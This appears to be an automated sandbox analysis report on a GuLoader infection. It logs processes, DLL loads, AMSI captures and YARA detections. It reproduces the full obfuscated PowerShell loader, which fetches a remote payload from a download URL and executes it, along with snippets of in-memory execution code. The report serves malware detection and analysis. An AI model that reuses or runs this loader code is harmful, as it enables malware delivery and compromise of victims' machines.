            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,niJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Noncongestion.For && echo t"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.2679288955.0000000008C99000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: .Core.pdb source: powershell.exe, 0000000D.00000002.2679288955.0000000008C70000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdbk source: powershell.exe, 0000000D.00000002.2673202295.0000000007C74000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: em.Core.pdb source: powershell.exe, 0000000D.00000002.2673202295.0000000007C74000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 0000000D.00000002.2666861261.000000000632B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Found suspicious powershell code related to unpacking or dynamic code loading
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Blyantstegninger)$global:Prvekrt = [System.Text.Encoding]::ASCII.GetString($Skimmet)$global:Berceau=$Prvekrt.substring($Forblndede,$Antisiphon)<#Autogamies brnefdselsdagene Footlike
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((udkrsel $Periodically174 $Skelstene), (Variabeltypen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Endelighederne = [AppDomain]::CurrentDomain.GetAssembl
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Ao)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Eftersnakkens, $false).DefineType($Kiltens, $Gothersga
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Blyantstegninger)$global:Prvekrt = [System.Text.Encoding]::ASCII.GetString($Skimmet)$global:Berceau=$Prvekrt.substring($Forblndede,$Antisiphon)<#Autogamies brnefdselsdagene Footlike
            Obfuscated command line found
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG 